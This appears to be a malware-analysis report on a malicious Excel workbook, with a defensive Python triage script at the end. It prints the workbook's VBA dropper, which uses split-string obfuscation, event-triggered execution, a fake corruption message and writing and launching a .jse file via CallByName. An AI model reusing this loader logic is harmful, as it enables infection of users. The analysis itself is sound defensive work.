Verdict: MALICIOUS
Risk Score: 230

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
ClamAV identifies the sample as malicious with the signature Xls.Dropper.Generic-9765465-0. The workbook carries a VBA project whose Sheet1 module mixes benign tutorial filler (page-header and duplicate-highlighting routines under a copied "14. Highlight Named Ranges" comment) with a staged dropper. The macro assembles the path FORT.jse next to the active workbook from split string fragments ("\FORT" & "" & ".j" & "" & "s" & "e"), writes the contents of a UserForm text control (UserForm1.Doner.Value) to that file, and then passes the double-quoted path to a COM method invoked through CallByName. The object ProgID and the method name are read at run time from UserForm label captions (UserForm1.xx0, xx1 and Film), so neither appears as a string in the extracted macro source; the .jse extension and the argument shape (a quoted path followed by the integer 1) are consistent with launching a JScript Encoded second stage, but the executing component itself is not visible in this listing. Execution is not hooked on Workbook_Open: the Worksheet_Calculate and Worksheet_PivotTableUpdate handlers call Bei_yhu, which saves a copy of the workbook as Note<n>.xlsm under <Excel startup path>\..\Pray2, reopens it, and uses Application.Run to invoke the file-writing routine (DOlrf) on the first pass and the executing routine (PO_NOx) on the second, using a UserForm label caption (UserForm1.Label1) as the state flag. PO_NOx evaluates the CallByName inside the argument of a "file is corrupted" message box and then closes the workbook with SaveChanges:=True.
Heuristics (6)
- ClamAV: Xls.Dropper.Generic-9765465-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Generic-9765465-0
- VBA project inside OOXML (medium, OOXML_VBA; 2 related findings): document contains a VBA project, i.e. VBA macros are present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call in the VBA source
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call in the VBA source
- External hyperlinks (4) (low, OOXML_EXTERNAL_HYPERLINKS): document contains 4 external hyperlinks; clickable URLs are stored as external relationships. First target: https://www.quora.com/profile/Alok-Jha-43
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The two truncated http://schemas... entries below are consistent with the XML namespace URIs that every OOXML part declares, not with attacker-supplied links.
  - http://schemas.micr (in document text: OOXML body / shared strings)
  - http://schemas (in document text: OOXML body / shared strings)
  - https://www.quora.com/profile/Alok-Jha-43 (document hyperlink)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4538 bytes | 81c5d81e4281db8b8b5d5ad38e9ebf7df1152976cfba7c046c230e77581622d2 | |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 686080 bytes | d3e7eb1932d0840d9a80c15f619c72e2f05a0c71716d0ba74b9be0610299b97b | ClamAV: Xls.Dropper.Generic-9765465-0; obfuscation or payload: unlikely |
| emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 1842004 bytes | 0295c5e4bea86a8a79ab50edfaa4d774e2d02df6ff818f54392499799e047686 | |

Preview of macros.bas (first 1,000 lines of the extracted script, reproduced as carved; the report truncates the listing mid-line):

```vb
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'14. Highlight Named Ranges
'
'If you are not sure about how many named ranges you have in your worksheet then you can use this code to highlight all of them.
'
Sub CustomHeader()
Dim myText As String
myText = InputBox("Enter your text here", "Enter Text")
With ActiveSheet.PageSetup
.LeftHeader = ""
.CenterHeader = myText
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
End Sub
Sub HighlightDuplicateValues()
Dim myRange As Range
Dim myCell As Range
Set myRange = Selection
For Each myCell In myRange
If WorksheetFunction.CountIf(myRange, myCell.Value) > 1 Then
myCell.Interior.ColorIndex = 36
End If
Next myCell
End Sub
Sub highlightCommentCells(se As String)
Selection.SpecialCells(xlCellTypeComments).Select
Selection.Style = se
End Sub
Private Function MIObj() As Object
Dim Rng As Range
Dim x As Range
Set x = Worksheets("Sheet1").Cells
For Each Rng In Selection
If WorksheetFunction.IsNumber(Rng) Then
If Rng.Value < 0 Then
Rng.Font.Color = -16776961
End If
End If
Set MIObj = CreateObject(Replace(UserForm1.xx0.Caption & UserForm1.xx1.Caption, " ", ""))
Next
End Function
Private Sub PO_NOx()
Dim DbNop As String
Dim BTgol As String
BTgol = """"
'highlightCommentCells BTgol
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "Finish"
MsgBox Application.Path & Chr(13) & Chr(10) & ": The file is corrupted and cannot be opened " & CallByName(MIObj, UserForm1.Film.Caption, 1, BTgol & DbNop & BTgol, 1)
HighlightDuplicateValues
ActiveWorkbook.Close SaveChanges:=True
End Sub
Private Sub DOlrf()
Debug.Print "drswe"
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "hyij"
Open DbNop For Output As #1
Debug.Print "rtf ijuo"
Print #1, UserForm1.Doner.Value
Debug.Print "Kol 7yh7"
Close #1
End Sub
Sub Bei_yhu(FInrtg As Byte)
Dim SA As Workbook
Debug.Print "esdruyg"
awse = ActiveWorkbook.Application.StartupPath & "\..\Pray2"
'ActiveWorkbook.Ap
On Error Resume Next
MkDir awse
NRople = awse & "\Note" & FInrtg & ".xlsm"
Application.DisplayAlerts = False
ActiveWorkbook.SaveCopyAs NRople
Subrt2 = "DOlrf"
Debug.Print "esdruyg"
Jolp = "PO_NOx"
Set SA = Workbooks.Open(NRople)
If UserForm1.Label1.Caption = "Solt" Then
UserForm1.Label1.Caption = "seaq gytugty"
'first
SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Subrt2
Else
'second
SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Jolp
End If
Set SA = Nothing
Debug.Print "Kol 7yh7"
End Sub
Private Sub Worksheet_PivotTableUpdate(ByVal Target As PivotTable)
'runs
Bei_yhu 102
End Sub
Private Sub Worksheet_Calculate()
'mer
Bei_yhu 101
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{75B6774F-339A-4ADB-B614-4A5ACC9DED60}{DD47C5FB-8B24-4F24-99DA-844CDEFF4F86}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
Debug.Print "Change"
End Sub
Private Sub Label3_Click()
End Sub
Private Sub ComboBox1_Change()
End Sub
Private Sub RefEdit1_BeforeDragOver(Cancel As Boolean, ByVal Data As MSForms.DataObject, ByVal x As stdole.OLE_XPOS_CONTAINER, ByVal y As stdole.OLE_YPOS_CONTAINER, By
```
... (truncated)
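Static triage of the dropper logic in the listing above, as an added example that is not part of this report or of the analyzer's own tooling. The script folds VBA `&` concatenations back into strings (so `"\FORT" & "" & ".j" & "" & "s" & "e"` reads as `\FORT.jse`), substitutes variables it has already recovered into later expressions, lists the CreateObject/CallByName/Shell/Application.Run calls whose targets are only resolved at run time, and flags auto-execution event handlers. The VBA excerpt embedded in it is copied from the macros.bas preview; the `<placeholder>` notation, the set of event-handler names checked and the function names are the example's own choices.

```python
import re

# Constructed excerpt of the Sheet1 module from this report's macros.bas preview
# (selected lines copied from the listing above, not the full module).
VBA_EXCERPT = r'''
Private Function MIObj() As Object
Set MIObj = CreateObject(Replace(UserForm1.xx0.Caption & UserForm1.xx1.Caption, " ", ""))
End Function
Private Sub PO_NOx()
BTgol = """"
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
MsgBox Application.Path & Chr(13) & Chr(10) & ": The file is corrupted and cannot be opened " & CallByName(MIObj, UserForm1.Film.Caption, 1, BTgol & DbNop & BTgol, 1)
End Sub
Private Sub DOlrf()
Open DbNop For Output As #1
Print #1, UserForm1.Doner.Value
Close #1
End Sub
Sub Bei_yhu(FInrtg As Byte)
awse = ActiveWorkbook.Application.StartupPath & "\..\Pray2"
NRople = awse & "\Note" & FInrtg & ".xlsm"
Subrt2 = "DOlrf"
Set SA = Workbooks.Open(NRople)
SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Subrt2
End Sub
Private Sub Worksheet_Calculate()
Bei_yhu 101
End Sub
'''

# Pieces of a VBA '&' expression: string literal ("" escapes a quote), Chr(n),
# numeric literal, or an identifier/property/simple call that only resolves at run time.
TOKEN_RE = re.compile(
    r'"((?:[^"]|"")*)"'
    r'|Chr\(\s*(\d+)\s*\)'
    r'|(\d+)'
    r'|([A-Za-z_][\w.]*(?:\([^()]*\))?)'
)
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.M)
CALL_RE = re.compile(r'\b(CreateObject|CallByName|Shell|Application\.Run)\b\s*\(?(.*)$', re.M)
# Event handlers that run without a button click; the list is this example's choice.
TRIGGER_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+(Auto_Open|AutoOpen|Workbook_Open|Workbook_Activate|'
    r'Document_Open|Worksheet_Calculate|Worksheet_Change|Worksheet_SelectionChange|'
    r'Worksheet_PivotTableUpdate)\b', re.M | re.I)


def fold_concat(expr):
    """Collapse a '&' concatenation into one string; run-time parts become <placeholders>."""
    out = []
    for lit, chr_code, num, ident in TOKEN_RE.findall(expr):
        if ident:
            out.append('<' + ident + '>')
        elif chr_code:
            out.append(chr(int(chr_code)))
        elif num:
            out.append(num)
        else:
            out.append(lit.replace('""', '"'))
    return ''.join(out)


def resolve(value, known):
    """Substitute <name> placeholders whose value was recovered from an earlier assignment."""
    for _ in range(8):  # bounded so a self-referential assignment cannot loop forever
        new = re.sub(r'<(\w+)>', lambda m: known.get(m.group(1), m.group(0)), value)
        if new == value:
            return value
        value = new
    return value


def split_args(text):
    """Split an argument list at top-level commas, honouring strings and nested parens."""
    args, buf, depth, in_str = [], [], 0, False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == '(':
                depth += 1
            elif ch == ')':
                if depth == 0:
                    break  # closing paren of the call itself
                depth -= 1
            elif ch == ',' and depth == 0:
                args.append(''.join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    args.append(''.join(buf).strip())
    return [a for a in args if a]


def recover_strings(src):
    """Evaluate every 'var = a & "b" & c' assignment, in source order."""
    known = {}
    for name, rhs in ASSIGN_RE.findall(src):
        if '&' in rhs or rhs.startswith('"'):
            known[name] = resolve(fold_concat(rhs), known)
    return known


def dynamic_calls(src, known):
    """Return (callee, resolved args, all_static) for each CreateObject/CallByName/Shell/Run."""
    found = []
    for callee, rest in CALL_RE.findall(src):
        args = [resolve(fold_concat(a), known) for a in split_args(rest)]
        found.append((callee, args, not any('<' in a for a in args)))
    return found


def triage(src):
    known = recover_strings(src)
    return {'strings': known, 'calls': dynamic_calls(src, known),
            'triggers': TRIGGER_RE.findall(src)}


if __name__ == '__main__':
    for section, items in triage(VBA_EXCERPT).items():
        print(section)
        for item in (items.items() if isinstance(items, dict) else items):
            print('   ', item)
```

Run against the excerpt, `strings` recovers `DbNop` as `<ActiveWorkbook.Path>\FORT.jse` and `NRople` as `<ActiveWorkbook.Application.StartupPath>\..\Pray2\Note<FInrtg>.xlsm`, `calls` shows the CallByName argument as the double-quoted `.jse` path with the method name still a `<UserForm1.Film.Caption>` placeholder (it lives in the form, not in the macro text), and `triggers` reports `Worksheet_Calculate`. Anything that stays in angle brackets is what a dynamic run, or a dump of the UserForm's control properties from vbaProject.bin, still has to supply.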